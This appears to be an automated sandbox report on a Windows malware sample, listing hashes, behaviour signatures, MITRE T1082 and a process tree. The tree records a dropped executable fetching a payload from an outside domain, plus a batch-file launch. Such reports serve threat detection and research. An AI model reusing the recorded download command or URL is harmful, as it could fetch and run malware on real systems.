cf1d716fbc064b81287f986592d2db331f7327d1cb8e0d59200d94062f505cfb

Analysis

max time kernel
1s
max time network
123s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
30/12/2023, 11:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1704bfd87f41aa763b0aa0b1448a406d.exe
Size

88KB
MD5

1704bfd87f41aa763b0aa0b1448a406d
SHA1

c366496052a521d7cf07f7de3dc63682395f9a5d
SHA256

cf1d716fbc064b81287f986592d2db331f7327d1cb8e0d59200d94062f505cfb
SHA512

1b54379f3603d0516fcda059eb29b8430e7566fc9f11a43bf60cc584011a45acf142bf8ee11d14fa3a758d8e5989b659cb127d0d707cc8d5afae68016771d937
SSDEEP

1536:WtYBIt4ZDsGq2NToL368mKNe3y9FNZk6ARSz5lC7pXz9CPl7Z:I6psJoToevKg3WBK2XCq9N

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2372	A5DAB-tmp.exe

Loads dropped DLL 3 IoCs

pid	Process
2088	1704bfd87f41aa763b0aa0b1448a406d.exe
2088	1704bfd87f41aa763b0aa0b1448a406d.exe
2088	1704bfd87f41aa763b0aa0b1448a406d.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2088 wrote to memory of 2372	2088	1704bfd87f41aa763b0aa0b1448a406d.exe	19
PID 2088 wrote to memory of 2372	2088	1704bfd87f41aa763b0aa0b1448a406d.exe	19
PID 2088 wrote to memory of 2372	2088	1704bfd87f41aa763b0aa0b1448a406d.exe	19
PID 2088 wrote to memory of 2372	2088	1704bfd87f41aa763b0aa0b1448a406d.exe	19

C:\Users\Admin\AppData\Local\Temp\1704bfd87f41aa763b0aa0b1448a406d.exe
"C:\Users\Admin\AppData\Local\Temp\1704bfd87f41aa763b0aa0b1448a406d.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2088
- C:\Users\Admin\AppData\Local\Temp\A5DAB-tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\A5DAB-tmp.exe" http://globalsoftwareagreement.com/drv32.data "C:\Users\Admin\AppData\Local\Temp\A5DAB-tmpa"
  2⤵
  - Executes dropped EXE
  PID:2372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\smp.bat" "
  2⤵
  PID:2512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2088-32-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/2372-15-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download